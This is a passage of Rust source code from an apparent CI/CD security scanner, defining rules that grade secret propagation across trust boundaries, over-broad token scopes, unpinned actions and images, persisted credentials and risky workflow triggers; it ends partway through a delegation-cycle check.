use crate::finding::{
Finding, FindingCategory, FindingExtras, FindingSource, Recommendation, Severity,
};
use crate::graph::{
is_docker_digest_pinned, is_sha_pinned, AuthorityCompleteness, AuthorityGraph, EdgeKind,
IdentityScope, NodeId, NodeKind, TrustZone, META_ADD_SPN_TO_ENV, META_ATTESTS, META_CACHE_KEY,
META_CHECKOUT_REF, META_CHECKOUT_SELF, META_CLI_FLAG_EXPOSED, META_CONTAINER, META_DIGEST,
META_DISPATCH_INPUTS, META_DOTENV_FILE, META_DOWNLOADS_ARTIFACT, META_ENVIRONMENT_NAME,
META_ENVIRONMENT_URL, META_ENV_APPROVAL, META_FORK_CHECK, META_GITLAB_ALLOW_FAILURE,
META_GITLAB_CACHE_KEY, META_GITLAB_CACHE_POLICY, META_GITLAB_DIND_SERVICE, META_GITLAB_EXTENDS,
META_GITLAB_INCLUDES, META_GITLAB_TRIGGER_KIND, META_IDENTITY_SCOPE, META_IMPLICIT,
META_INTERACTIVE_DEBUG, META_INTERPRETS_ARTIFACT, META_JOB_NAME, META_JOB_OUTPUTS, META_NEEDS,
META_NO_WORKFLOW_PERMISSIONS, META_OIDC, META_OIDC_AUDIENCE, META_PERMISSIONS, META_PLATFORM,
META_READS_ENV, META_REPOSITORIES, META_RULES_PROTECTED_ONLY, META_SCRIPT_BODY,
META_SECRETS_INHERIT, META_SELF_HOSTED, META_SERVICE_CONNECTION, META_SERVICE_CONNECTION_NAME,
META_TERRAFORM_AUTO_APPROVE, META_TRIGGER, META_TRIGGERS, META_VARIABLE_GROUP,
META_WRITES_ENV_GATE,
};
use crate::propagation;
/// Clamp `severity` so it is never more severe than `max_severity`.
///
/// `Severity` orders Critical lowest (most severe compares smallest), so a
/// value below the cap is *more* severe and is raised up to the cap.
fn cap_severity(severity: Severity, max_severity: Severity) -> Severity {
    if severity >= max_severity {
        severity
    } else {
        max_severity
    }
}
/// When the graph is only partially built, cap every finding at High —
/// we cannot justify Critical confidence on incomplete evidence. Complete
/// graphs keep their computed severities untouched.
fn apply_confidence_cap(graph: &AuthorityGraph, findings: &mut [Finding]) {
    if graph.completeness == AuthorityCompleteness::Partial {
        for finding in findings.iter_mut() {
            finding.severity = cap_severity(finding.severity, Severity::High);
        }
    }
}
/// MVP Rule 1: Authority (secret/identity) propagated across a trust boundary.
///
/// **Clustering (v0.9.x):** all paths from the same root authority node
/// (Secret/Identity) collapse into ONE finding per source. The single
/// finding carries every reached sink in `nodes_involved` — `[source,
/// sink_a, sink_b, ...]` — and lists them in the message. This matches
/// the SARIF fingerprint behaviour (which already collapses per
/// `root_authority_node_name`) and removes the alert-fatigue cliff seen
/// on the GHA corpus where one `GITHUB_TOKEN` could produce 8+ near-
/// identical findings as it propagated through a matrix workflow.
///
/// Severity graduation (per-path, then max-over-paths):
/// - Untrusted sink: Critical (real risk — unpinned code with authority)
/// - SHA-pinned ThirdParty sink: High (immutable code, but still cross-boundary)
/// - SHA-pinned sink + constrained identity: Medium (lowest-risk form — read-only
/// token to immutable third-party code, e.g. `contents:read` → `actions/checkout@sha`)
///
/// When every path in a cluster crosses an environment approval gate,
/// the cluster's severity is downgraded one step (mirroring the
/// per-path downgrade the previous emitter applied).
pub fn authority_propagation(graph: &AuthorityGraph, max_hops: usize) -> Vec<Finding> {
    let paths = propagation::propagation_analysis(graph, max_hops);
    // Group by root authority source node. We preserve insertion order so
    // findings come out in the same order they would have under per-hop
    // emission (callers and golden-file tests rely on the source-first
    // ordering of authority_propagation findings).
    let mut order: Vec<NodeId> = Vec::new();
    let mut groups: std::collections::HashMap<NodeId, Vec<propagation::PropagationPath>> =
        std::collections::HashMap::new();
    // Only boundary-crossing paths are findings; same-zone propagation is fine.
    for path in paths.into_iter().filter(|p| p.crossed_boundary) {
        groups
            .entry(path.source)
            .or_insert_with(|| {
                // First path seen for this source: remember it in `order` so
                // the emission loop below visits sources first-seen-first.
                order.push(path.source);
                Vec::new()
            })
            .push(path);
    }
    let mut findings = Vec::with_capacity(order.len());
    for source_id in order {
        let paths = match groups.remove(&source_id) {
            Some(p) if !p.is_empty() => p,
            _ => continue,
        };
        // Display name of the root authority node ("?" for a stale id).
        let source_name = graph
            .node(source_id)
            .map(|n| n.name.as_str())
            .unwrap_or("?")
            .to_string();
        // Constrained identity scope qualifies the cluster for the Medium tier.
        let source_is_constrained = graph
            .node(source_id)
            .and_then(|n| n.metadata.get(META_IDENTITY_SCOPE))
            .map(|s| s == "constrained")
            .unwrap_or(false);
        // OIDC sources are excluded from the pinned-sink severity reductions.
        let source_is_oidc = graph
            .node(source_id)
            .and_then(|n| n.metadata.get(META_OIDC))
            .map(|v| v == "true")
            .unwrap_or(false);
        // Walk every path in the cluster and compute (severity, gated?,
        // sink id, representative path) — the cluster takes the max
        // severity (i.e. the worst sink wins). Severity is downgraded
        // only when every path in the cluster crosses an env-approval
        // gate; if even one path bypasses the gate, the cluster is not
        // downgraded.
        let mut worst_sev = Severity::Info;
        let mut all_gated = true;
        let mut best_path: Option<propagation::PropagationPath> = None;
        let mut sink_ids: Vec<NodeId> = Vec::new();
        let mut seen_sinks = std::collections::HashSet::new();
        for path in &paths {
            // "Pinned" = ThirdParty sink locked to an immutable digest.
            let sink_is_pinned = graph
                .node(path.sink)
                .map(|n| {
                    n.trust_zone == TrustZone::ThirdParty && n.metadata.contains_key(META_DIGEST)
                })
                .unwrap_or(false);
            let base_severity = if sink_is_pinned && source_is_constrained && !source_is_oidc {
                Severity::Medium
            } else if sink_is_pinned && !source_is_oidc {
                Severity::High
            } else {
                Severity::Critical
            };
            let gated = path_crosses_env_approval(graph, path);
            let effective_severity = if gated {
                downgrade_one_step(base_severity)
            } else {
                base_severity
            };
            if !gated {
                all_gated = false;
            }
            // Severity orders Critical lowest, so `<` reads "more severe than
            // the current worst"; the worst path also becomes the
            // representative `best_path` attached to the finding.
            if effective_severity < worst_sev {
                worst_sev = effective_severity;
                best_path = Some(path.clone());
            }
            // Dedupe sinks while preserving first-seen order.
            if seen_sinks.insert(path.sink) {
                sink_ids.push(path.sink);
            }
        }
        // Build sink name list for the message. Truncate aggressively past
        // ~5 names to avoid an unbounded message string on extreme inputs;
        // the full set is still in `nodes_involved`.
        let mut sink_names: Vec<String> = sink_ids
            .iter()
            .filter_map(|id| graph.node(*id).map(|n| n.name.clone()))
            .collect();
        let truncated = if sink_names.len() > 5 {
            let extra = sink_names.len() - 5;
            sink_names.truncate(5);
            format!(", …+{extra} more")
        } else {
            String::new()
        };
        let sink_list = sink_names.join(", ");
        let suffix = if all_gated && !paths.is_empty() {
            " (mitigated: environment approval gate)"
        } else {
            ""
        };
        // nodes_involved is [source, sink_a, sink_b, ...] — the clustering
        // contract described in the rule doc above.
        let mut nodes_involved = Vec::with_capacity(sink_ids.len() + 1);
        nodes_involved.push(source_id);
        nodes_involved.extend(sink_ids.iter().copied());
        let n = paths.len();
        let unique_sinks = sink_ids.len();
        let message = if unique_sinks == 1 {
            format!("{source_name} propagated to {sink_list} across trust boundary{suffix}")
        } else {
            format!(
                "{source_name} reaches {unique_sinks} sinks via authority propagation: [{sink_list}{truncated}]{suffix}"
            )
        };
        let _ = n; // path count retained in the cluster's `path` field; not surfaced separately
        findings.push(Finding {
            severity: worst_sev,
            category: FindingCategory::AuthorityPropagation,
            nodes_involved,
            message,
            recommendation: Recommendation::TsafeRemediation {
                command: "tsafe exec --ns <scoped-namespace> -- <command>".to_string(),
                explanation: format!("Scope {source_name} to only the steps that need it"),
            },
            path: best_path,
            source: FindingSource::BuiltIn,
            extras: FindingExtras::default(),
        });
    }
    findings
}
/// Returns true if any node touched by `path` — its source, its sink, or
/// either endpoint of any edge along the way — carries
/// `META_ENV_APPROVAL = "true"`.
fn path_crosses_env_approval(graph: &AuthorityGraph, path: &propagation::PropagationPath) -> bool {
    // A node is "gated" when it carries the env-approval marker.
    let gated = |id: NodeId| -> bool {
        graph
            .node(id)
            .and_then(|n| n.metadata.get(META_ENV_APPROVAL))
            .map_or(false, |v| v == "true")
    };
    gated(path.source)
        || gated(path.sink)
        || path
            .edges
            .iter()
            .filter_map(|&edge_id| graph.edge(edge_id))
            .any(|edge| gated(edge.from) || gated(edge.to))
}
/// Step a severity down one notch: Critical→High, High→Medium, Medium→Low.
/// Low and Info sit at the floor of meaningful reduction and pass through
/// unchanged.
fn downgrade_one_step(severity: Severity) -> Severity {
    match severity {
        Severity::Critical => Severity::High,
        Severity::High => Severity::Medium,
        Severity::Medium => Severity::Low,
        // Already at (or below) the floor — nothing left to shed.
        Severity::Low | Severity::Info => severity,
    }
}
/// MVP Rule 2: Identity scope broader than actual usage.
///
/// Classifies each Identity node via the precision layer's `IdentityScope`.
/// Broad scopes flag at High and Unknown at Medium — if the scope cannot be
/// determined we treat it as risky rather than assume safety. Constrained
/// identities are never flagged, and neither are identities with no
/// accessing steps.
pub fn over_privileged_identity(graph: &AuthorityGraph) -> Vec<Finding> {
    let mut findings = Vec::new();
    for identity in graph.nodes_of_kind(NodeKind::Identity) {
        let granted_scope = identity
            .metadata
            .get(META_PERMISSIONS)
            .cloned()
            .unwrap_or_default();
        // Prefer the parser-supplied scope classification; otherwise fall
        // back to classifying the raw permissions string ourselves.
        let scope = identity
            .metadata
            .get(META_IDENTITY_SCOPE)
            .and_then(|s| match s.as_str() {
                "broad" => Some(IdentityScope::Broad),
                "constrained" => Some(IdentityScope::Constrained),
                "unknown" => Some(IdentityScope::Unknown),
                _ => None,
            })
            .unwrap_or_else(|| IdentityScope::from_permissions(&granted_scope));
        // Constrained is fine — skip. Everything else carries a severity
        // and a human-readable label for the message.
        let (severity, scope_label) = match scope {
            IdentityScope::Broad => (Severity::High, "broad"),
            IdentityScope::Unknown => (Severity::Medium, "unknown (treat as risky)"),
            IdentityScope::Constrained => continue,
        };
        let accessor_steps: Vec<_> = graph
            .edges_to(identity.id)
            .filter(|e| e.kind == EdgeKind::HasAccessTo)
            .filter_map(|e| graph.node(e.from))
            .collect();
        // An identity nothing accesses has no exploitable surface — skip.
        if accessor_steps.is_empty() {
            continue;
        }
        findings.push(Finding {
            severity,
            category: FindingCategory::OverPrivilegedIdentity,
            path: None,
            nodes_involved: std::iter::once(identity.id)
                .chain(accessor_steps.iter().map(|n| n.id))
                .collect(),
            message: format!(
                "{} has {} scope (permissions: '{}') — likely broader than needed",
                identity.name, scope_label, granted_scope
            ),
            recommendation: Recommendation::ReducePermissions {
                current: granted_scope.clone(),
                minimum: "{ contents: read }".into(),
            },
            source: FindingSource::BuiltIn,
            // Working out the minimum-needed scope across N jobs is a
            // ~1 hour audit, not a flag flip — Small.
            extras: FindingExtras {
                time_to_fix: Some(crate::finding::FixEffort::Small),
                ..FindingExtras::default()
            },
        });
    }
    findings
}
/// MVP Rule 3: Third-party action/image without SHA pin.
///
/// **Severity tiering (v0.9.x):** a single flat severity produced uniform
/// noise on monorepo CI files, so the owner of the unpinned action now
/// drives the tier (per the blue-team corpus report,
/// `MEMORY/.../blueteam-corpus-defense.md`):
/// * Same-repo composite action (`./.github/actions/*`) → **Info** — the
///   action lives in the consumer's own repo, so there is no external
///   supply-chain surface; pinning is hygiene, not a control gap.
/// * Well-known first-party owner (`actions/*`, `github/*`, `actions-rs/*`,
///   `docker/*`) → **Medium** — the supply-chain surface exists but is
///   operationally narrow and well-monitored.
/// * Everything else (`random-org/foo@v1`, …) → **High** — unbounded
///   supply-chain risk, the case the rule was originally designed for.
///
/// Deduplicates by action reference — the same action used in multiple jobs
/// produces multiple Image nodes but should only be flagged once.
pub fn unpinned_action(graph: &AuthorityGraph) -> Vec<Finding> {
    let mut findings = Vec::new();
    let mut seen = std::collections::HashSet::new();
    for image in graph.nodes_of_kind(NodeKind::Image) {
        // Container images are floating_image's job — skip them here so the
        // same node is never flagged as both UnpinnedAction and FloatingImage.
        let is_container = image
            .metadata
            .get(META_CONTAINER)
            .map_or(false, |v| v == "true");
        // Self-hosted runner labels live in the FirstParty zone but aren't an
        // action reference — there is no `@version` to pin, and without this
        // guard every `runs-on: self-hosted` line would fire.
        let is_self_hosted = image
            .metadata
            .get(META_SELF_HOSTED)
            .map_or(false, |v| v == "true");
        if is_container || is_self_hosted {
            continue;
        }
        // Same-repo composite actions (`./.github/actions/foo`) sit in the
        // FirstParty zone. Other FirstParty Image nodes (self-hosted pool
        // labels, hosted runner names) are not flaggable references — we
        // admit FirstParty into the severity ladder ONLY for the
        // relative-path form, and emit Info for it.
        let is_local_composite = image.name.starts_with("./");
        if image.trust_zone == TrustZone::FirstParty && !is_local_composite {
            continue;
        }
        // Deduplicate: the same action reference is flagged once.
        if !seen.insert(&image.name) {
            continue;
        }
        // Already pinned — either a digest in metadata or a SHA-form ref.
        if image.metadata.contains_key(META_DIGEST) || is_sha_pinned(&image.name) {
            continue;
        }
        // Tier severity by owner (see the rule doc above). The local-composite
        // case is already decided; everything else keys off the `<owner>/...`
        // prefix: known first-party supplier vs unknown supplier.
        let severity = if is_local_composite {
            Severity::Info
        } else if is_well_known_first_party_action(&image.name) {
            Severity::Medium
        } else {
            Severity::High
        };
        findings.push(Finding {
            severity,
            category: FindingCategory::UnpinnedAction,
            path: None,
            nodes_involved: vec![image.id],
            message: format!("{} is not pinned to a SHA digest", image.name),
            recommendation: Recommendation::PinAction {
                current: image.name.clone(),
                pinned: format!(
                    "{}@<sha256-digest>",
                    image.name.split('@').next().unwrap_or(&image.name)
                ),
            },
            source: FindingSource::BuiltIn,
            // Mechanical fix: replace `@v3` with `@<40-char-sha>`. ~5 min.
            extras: FindingExtras {
                time_to_fix: Some(crate::finding::FixEffort::Trivial),
                ..FindingExtras::default()
            },
        });
    }
    findings
}
/// Owners treated as well-known first-party for severity tiering. Kept
/// deliberately short and conservative — listing an org here downgrades
/// every unpinned action it ships, so the bar is "GitHub-maintained or
/// directly adjacent core tooling." Everything else stays at the High
/// default.
fn is_well_known_first_party_action(uses: &str) -> bool {
    // The owner is whatever precedes the first '/', after dropping any
    // trailing `@<ref>` suffix.
    let owner = uses
        .split('@')
        .next()
        .and_then(|bare| bare.split('/').next())
        .unwrap_or("");
    ["actions", "github", "actions-rs", "docker"].contains(&owner)
}
/// MVP Rule 4: Untrusted step has direct access to secret/identity.
///
/// Walks every Step node in the Untrusted zone and flags each `HasAccessTo`
/// edge to a Secret or Identity node. Platform-implicit tokens
/// (`META_IMPLICIT = "true"`) are reported at Info; everything else at
/// Critical. A `META_CLI_FLAG_EXPOSED` marker on a Secret switches the
/// recommendation to moving the value out of `-var` flags and adds a
/// log-exposure note to the message.
pub fn untrusted_with_authority(graph: &AuthorityGraph) -> Vec<Finding> {
    let mut findings = Vec::new();
    for step in graph.nodes_in_zone(TrustZone::Untrusted) {
        // nodes_in_zone can return non-Step kinds; this rule is step-only.
        if step.kind != NodeKind::Step {
            continue;
        }
        // Check if this untrusted step directly accesses any authority source
        for edge in graph.edges_from(step.id) {
            if edge.kind != EdgeKind::HasAccessTo {
                continue;
            }
            if let Some(target) = graph.node(edge.to) {
                if matches!(target.kind, NodeKind::Secret | NodeKind::Identity) {
                    // Secret passed on the command line as a -var flag —
                    // drives both the recommendation and the message suffix.
                    let cli_flag_exposed = target
                        .metadata
                        .get(META_CLI_FLAG_EXPOSED)
                        .map(|v| v == "true")
                        .unwrap_or(false);
                    // Platform-implicit tokens (e.g. ADO System.AccessToken) are structurally
                    // accessible to all tasks by design. Flag at Info — real but not actionable
                    // as a misconfiguration. Explicit secrets/service connections stay Critical.
                    let is_implicit = target
                        .metadata
                        .get(META_IMPLICIT)
                        .map(|v| v == "true")
                        .unwrap_or(false);
                    // Secrets get remediation commands; identities get a
                    // permissions-reduction recommendation instead.
                    let recommendation = if target.kind == NodeKind::Secret {
                        if cli_flag_exposed {
                            Recommendation::Manual {
                                action: format!(
                                    "Move '{}' from -var flag to TF_VAR_{} env var — \
                                    -var values appear in pipeline logs and Terraform plan output",
                                    target.name, target.name
                                ),
                            }
                        } else {
                            Recommendation::CellosRemediation {
                                reason: format!(
                                    "Untrusted step '{}' has direct access to secret '{}'",
                                    step.name, target.name
                                ),
                                spec_hint: format!(
                                    "cellos run --network deny-all --broker env:{}",
                                    target.name
                                ),
                            }
                        }
                    } else {
                        // Identity branch — for implicit platform tokens, add a CellOS
                        // compensating-control note since the token cannot be un-injected
                        // at the platform layer.
                        let minimum = if is_implicit {
                            "minimal required scope — or use CellOS deny-all egress as a compensating control to limit exfiltration of the injected token".into()
                        } else {
                            "minimal required scope".into()
                        };
                        Recommendation::ReducePermissions {
                            current: target
                                .metadata
                                .get(META_PERMISSIONS)
                                .cloned()
                                .unwrap_or_else(|| "unknown".into()),
                            minimum,
                        }
                    };
                    let log_exposure_note = if cli_flag_exposed {
                        " (passed as -var flag — value visible in pipeline logs)"
                    } else {
                        ""
                    };
                    // Severity and message move together: implicit tokens are
                    // Info (structural, by design); everything else Critical.
                    let (severity, message) =
                        if is_implicit {
                            (
                                Severity::Info,
                                format!(
                                    "Untrusted step '{}' has structural access to implicit {} '{}' \
                                    (platform-injected — all tasks receive this token by design){}",
                                    step.name,
                                    if target.kind == NodeKind::Secret { "secret" } else { "identity" },
                                    target.name,
                                    log_exposure_note,
                                ),
                            )
                        } else {
                            (
                                Severity::Critical,
                                format!(
                                    "Untrusted step '{}' has direct access to {} '{}'{}",
                                    step.name,
                                    if target.kind == NodeKind::Secret {
                                        "secret"
                                    } else {
                                        "identity"
                                    },
                                    target.name,
                                    log_exposure_note,
                                ),
                            )
                        };
                    findings.push(Finding {
                        severity,
                        category: FindingCategory::UntrustedWithAuthority,
                        path: None,
                        nodes_involved: vec![step.id, target.id],
                        message,
                        recommendation,
                        source: FindingSource::BuiltIn,
                        extras: FindingExtras::default(),
                    });
                }
            }
        }
    }
    findings
}
/// MVP Rule 5: Artifact produced by privileged step consumed across trust boundary.
///
/// For each Artifact node, any producer that holds authority (HasAccessTo a
/// Secret or Identity) is paired with every consumer in a lower trust zone;
/// each such pair yields one High finding.
pub fn artifact_boundary_crossing(graph: &AuthorityGraph) -> Vec<Finding> {
    let mut findings = Vec::new();
    for artifact in graph.nodes_of_kind(NodeKind::Artifact) {
        // Producers that matter: ones holding secret/identity authority.
        let privileged_producers: Vec<_> = graph
            .edges_to(artifact.id)
            .filter(|e| e.kind == EdgeKind::Produces)
            .filter_map(|e| graph.node(e.from))
            .filter(|producer| {
                graph.edges_from(producer.id).any(|e| {
                    e.kind == EdgeKind::HasAccessTo
                        && graph.node(e.to).map_or(false, |n| {
                            matches!(n.kind, NodeKind::Secret | NodeKind::Identity)
                        })
                })
            })
            .collect();
        if privileged_producers.is_empty() {
            continue;
        }
        // Consumes edges go artifact -> step, so consumers hang off `edge.to`.
        let consumers: Vec<_> = graph
            .edges_from(artifact.id)
            .filter(|e| e.kind == EdgeKind::Consumes)
            .filter_map(|e| graph.node(e.to))
            .collect();
        for producer in &privileged_producers {
            for consumer in &consumers {
                // Only a drop in trust zone is a boundary crossing.
                if !consumer.trust_zone.is_lower_than(&producer.trust_zone) {
                    continue;
                }
                findings.push(Finding {
                    severity: Severity::High,
                    category: FindingCategory::ArtifactBoundaryCrossing,
                    path: None,
                    nodes_involved: vec![producer.id, artifact.id, consumer.id],
                    message: format!(
                        "Artifact '{}' produced by privileged step '{}' consumed by '{}' ({:?} -> {:?})",
                        artifact.name,
                        producer.name,
                        consumer.name,
                        producer.trust_zone,
                        consumer.trust_zone
                    ),
                    recommendation: Recommendation::TsafeRemediation {
                        command: format!(
                            "tsafe exec --ns {} -- <build-command>",
                            producer.name
                        ),
                        explanation: format!(
                            "Scope secrets to '{}' only; artifact '{}' should not carry authority",
                            producer.name, artifact.name
                        ),
                    },
                    source: FindingSource::BuiltIn,
                    extras: FindingExtras::default(),
                });
            }
        }
    }
    findings
}
/// Stretch Rule 9: Secret name matches known long-lived/static credential pattern.
///
/// Heuristic: secrets whose (uppercased) names contain AWS-key, API-key,
/// password, or private-key markers are likely static credentials that
/// should be replaced with OIDC federation.
pub fn long_lived_credential(graph: &AuthorityGraph) -> Vec<Finding> {
    // Substring markers checked against the uppercased secret name.
    const STATIC_PATTERNS: &[&str] = &[
        "AWS_ACCESS_KEY",
        "AWS_SECRET_ACCESS_KEY",
        "_API_KEY",
        "_APIKEY",
        "_PASSWORD",
        "_PASSWD",
        "_PRIVATE_KEY",
        "_SECRET_KEY",
        "_SERVICE_ACCOUNT",
        "_SIGNING_KEY",
    ];
    graph
        .nodes_of_kind(NodeKind::Secret)
        .filter(|secret| {
            let upper = secret.name.to_uppercase();
            STATIC_PATTERNS.iter().any(|p| upper.contains(p))
        })
        .map(|secret| Finding {
            severity: Severity::Low,
            category: FindingCategory::LongLivedCredential,
            path: None,
            nodes_involved: vec![secret.id],
            message: format!(
                "'{}' looks like a long-lived static credential",
                secret.name
            ),
            recommendation: Recommendation::FederateIdentity {
                static_secret: secret.name.clone(),
                oidc_provider: "GitHub Actions OIDC (id-token: write)".into(),
            },
            source: FindingSource::BuiltIn,
            // Migrating from PATs to OIDC across an org touches identity
            // policy, IAM trust relationships, and every downstream
            // consumer of the credential — Large effort.
            extras: FindingExtras {
                time_to_fix: Some(crate::finding::FixEffort::Large),
                ..FindingExtras::default()
            },
        })
        .collect()
}
/// Tier 6 Rule: Container image without Docker digest pinning.
///
/// Job-level containers marked with `META_CONTAINER` that aren't pinned to
/// `image@sha256:<64hex>` can be silently mutated between runs. Deduplicates
/// by image name (same image in multiple jobs flags once).
pub fn floating_image(graph: &AuthorityGraph) -> Vec<Finding> {
    let mut findings = Vec::new();
    let mut seen = std::collections::HashSet::new();
    for image in graph.nodes_of_kind(NodeKind::Image) {
        // Only nodes explicitly marked as job-level containers participate;
        // non-container images are unpinned_action's territory.
        let is_container = matches!(image.metadata.get(META_CONTAINER), Some(v) if v == "true");
        // Short-circuit order matters: non-containers skip before touching
        // the dedupe set; known names skip before the pin check.
        if !is_container
            || !seen.insert(image.name.as_str())
            || is_docker_digest_pinned(&image.name)
        {
            continue;
        }
        findings.push(Finding {
            severity: Severity::Medium,
            category: FindingCategory::FloatingImage,
            path: None,
            nodes_involved: vec![image.id],
            message: format!("Container image '{}' is not pinned to a digest", image.name),
            recommendation: Recommendation::PinAction {
                current: image.name.clone(),
                pinned: format!(
                    "{}@sha256:<digest>",
                    image.name.split(':').next().unwrap_or(&image.name)
                ),
            },
            source: FindingSource::BuiltIn,
            // `docker pull <image>` once and append `@sha256:<digest>` —
            // identical mechanical fix to unpinned_action. Trivial.
            extras: FindingExtras {
                time_to_fix: Some(crate::finding::FixEffort::Trivial),
                ..FindingExtras::default()
            },
        });
    }
    findings
}
/// Stretch Rule: checkout step with `persistCredentials: true` writes credentials to disk.
///
/// The PersistsTo edge connects a checkout step to the token it persists. Disk-resident
/// credentials are accessible to all subsequent steps (and to any process with filesystem
/// access), unlike runtime-only HasAccessTo authority which expires when the step exits.
pub fn persisted_credential(graph: &AuthorityGraph) -> Vec<Finding> {
    let mut findings = Vec::new();
    // PersistsTo edges run checkout-step -> persisted token.
    for edge in graph.edges.iter().filter(|e| e.kind == EdgeKind::PersistsTo) {
        // Both endpoints must resolve; stale ids are silently skipped.
        if let (Some(step), Some(target)) = (graph.node(edge.from), graph.node(edge.to)) {
            findings.push(Finding {
                severity: Severity::High,
                category: FindingCategory::PersistedCredential,
                path: None,
                nodes_involved: vec![step.id, target.id],
                message: format!(
                    "'{}' persists '{}' to disk via persistCredentials: true — \
                    credential remains in .git/config and is accessible to all subsequent steps",
                    step.name, target.name
                ),
                recommendation: Recommendation::Manual {
                    action: "Remove persistCredentials: true from the checkout step. \
                    Pass credentials explicitly only to steps that need them."
                        .into(),
                },
                source: FindingSource::BuiltIn,
                extras: FindingExtras::default(),
            });
        }
    }
    findings
}
/// Rule: dangerous trigger type (pull_request_target / pr) combined with secret/identity access.
///
/// Fires at most once per workflow: the graph-level `META_TRIGGER` must name
/// a high-risk trigger, and at least one step must hold authority
/// (HasAccessTo a Secret or Identity). All involved steps and authority
/// targets are aggregated into the single finding.
pub fn trigger_context_mismatch(graph: &AuthorityGraph) -> Vec<Finding> {
    let Some(trigger) = graph.metadata.get(META_TRIGGER).cloned() else {
        return Vec::new();
    };
    // Only these two trigger kinds are considered dangerous.
    let severity = match trigger.as_str() {
        "pull_request_target" => Severity::Critical,
        "pr" => Severity::High,
        _ => return Vec::new(),
    };
    // Gather authority-holding steps and (deduped, first-seen order) the
    // secret/identity nodes they reach.
    let mut steps_with_authority: Vec<NodeId> = Vec::new();
    let mut authority_targets: Vec<NodeId> = Vec::new();
    for step in graph.nodes_of_kind(NodeKind::Step) {
        let held: Vec<NodeId> = graph
            .edges_from(step.id)
            .filter(|e| e.kind == EdgeKind::HasAccessTo)
            .filter_map(|e| graph.node(e.to))
            .filter(|t| matches!(t.kind, NodeKind::Secret | NodeKind::Identity))
            .map(|t| t.id)
            .collect();
        if held.is_empty() {
            continue;
        }
        steps_with_authority.push(step.id);
        for target_id in held {
            if !authority_targets.contains(&target_id) {
                authority_targets.push(target_id);
            }
        }
    }
    if steps_with_authority.is_empty() {
        return Vec::new();
    }
    let n = steps_with_authority.len();
    let mut nodes_involved = steps_with_authority.clone();
    nodes_involved.extend(authority_targets);
    vec![Finding {
        severity,
        category: FindingCategory::TriggerContextMismatch,
        path: None,
        nodes_involved,
        message: format!(
            "Workflow triggered by {trigger} with secret/identity access — {n} step(s) hold authority that attacker-controlled code could reach"
        ),
        recommendation: Recommendation::Manual {
            action: "Use a separate workflow triggered by workflow_run (not pull_request_target) for privileged operations, or ensure no checkout of the PR head ref occurs before secret use".into(),
        },
        source: FindingSource::BuiltIn,
        extras: FindingExtras::default(),
    }]
}
/// Rule: authority (secret/identity) flows into an opaque external workflow via DelegatesTo.
///
/// For each Step node: find all `DelegatesTo` edges to Image nodes whose trust
/// zone is not FirstParty. If the same step also has `HasAccessTo` any Secret
/// or Identity, emit one finding per delegation edge — Critical for an
/// Untrusted delegate, High for ThirdParty.
pub fn cross_workflow_authority_chain(graph: &AuthorityGraph) -> Vec<Finding> {
    let mut findings = Vec::new();
    for step in graph.nodes_of_kind(NodeKind::Step) {
        // Collect the authority sources (secrets/identities) this step holds.
        let authority_nodes: Vec<&_> = graph
            .edges_from(step.id)
            .filter(|e| e.kind == EdgeKind::HasAccessTo)
            .filter_map(|e| graph.node(e.to))
            .filter(|n| matches!(n.kind, NodeKind::Secret | NodeKind::Identity))
            .collect();
        if authority_nodes.is_empty() {
            continue;
        }
        // Examine every DelegatesTo edge whose target is an Image node.
        for edge in graph.edges_from(step.id) {
            if edge.kind != EdgeKind::DelegatesTo {
                continue;
            }
            let Some(target) = graph.node(edge.to) else {
                continue;
            };
            if target.kind != NodeKind::Image {
                continue;
            }
            // Severity tracks how far outside our control the delegate is.
            // The exhaustive match is also the FirstParty filter — the
            // previous separate `if … == FirstParty { continue }` guard made
            // this arm unreachable, so it has been removed.
            let severity = match target.trust_zone {
                TrustZone::Untrusted => Severity::Critical,
                TrustZone::ThirdParty => Severity::High,
                // In-repo delegation is not a finding.
                TrustZone::FirstParty => continue,
            };
            let authority_names: Vec<String> =
                authority_nodes.iter().map(|n| n.name.clone()).collect();
            let authority_label = authority_names.join(", ");
            let mut nodes_involved = vec![step.id, target.id];
            nodes_involved.extend(authority_nodes.iter().map(|n| n.id));
            findings.push(Finding {
                severity,
                category: FindingCategory::CrossWorkflowAuthorityChain,
                path: None,
                nodes_involved,
                message: format!(
                    "'{}' delegates to '{}' ({:?}) while holding authority ({}) — authority chain extends into opaque external workflow",
                    step.name, target.name, target.trust_zone, authority_label
                ),
                recommendation: Recommendation::Manual {
                    action: format!(
                        "Pin '{}' to a full SHA digest; audit what authority the called workflow receives",
                        target.name
                    ),
                },
                source: FindingSource::BuiltIn,
                extras: FindingExtras::default(),
            });
        }
    }
    findings
}
/// Rule: circular DelegatesTo chain — workflow calls itself transitively.
///
/// Iterative DFS over `DelegatesTo` edges. Detects back edges (gray → gray) and
/// collects all nodes that participate in any cycle. If any cycles exist, emits
/// a single High-severity finding listing all cycle members.
pub fn authority_cycle(graph: &AuthorityGraph) -> Vec<Finding> {
    let n = graph.nodes.len();
    if n == 0 {
        return Vec::new();
    }
    // Pre-build adjacency list for DelegatesTo edges only. NodeId doubles as
    // a dense index here (the `edge.from < n` / `edge.to < n` guards bound
    // it), so a Vec-of-Vecs suffices — no HashMap needed.
    let mut delegates_to: Vec<Vec<NodeId>> = vec![Vec::new(); n];
    for edge in &graph.edges {
        if edge.kind == EdgeKind::DelegatesTo && edge.from < n && edge.to < n {
            delegates_to[edge.from].push(edge.to);
        }
    }
    // Three-color DFS: white = unvisited, gray = on the current DFS stack,
    // black = fully explored. A gray → gray edge is a back edge, i.e. a cycle.
    let mut color: Vec<u8> = vec![0u8; n]; // 0=white, 1=gray, 2=black
    let mut cycle_nodes: std::collections::BTreeSet<NodeId> = std::collections::BTreeSet::new();
    for start in 0..n {
        if color[start] != 0 {
            continue;
        }
        color[start] = 1;
        // Each stack entry is (node, index of the next out-edge to try) —
        // an explicit stack avoids recursion-depth limits on long chains.
        let mut stack: Vec<(NodeId, usize)> = vec![(start, 0)];
        loop {
            let len = stack.len();
            if len == 0 {
                break;
            }
            let (node_id, edge_idx) = stack[len - 1];
            if edge_idx < delegates_to[node_id].len() {
                // Advance the edge cursor before descending so this edge is
                // not revisited when control returns to `node_id`.
                stack[len - 1].1 += 1;
                let neighbor = delegates_to[node_id][edge_idx];
                if color[neighbor] == 1 {
                    // Back edge: cycle found. Collect every node between `neighbor`
                    // (the cycle start) and `node_id` (the cycle end) along the
                    // current DFS stack. All stack entries are gray by construction,
                    // so we walk the stack from `neighbor` to the top.
                    let cycle_start_idx =
                        stack.iter().position(|&(n, _)| n == neighbor).unwrap_or(0);
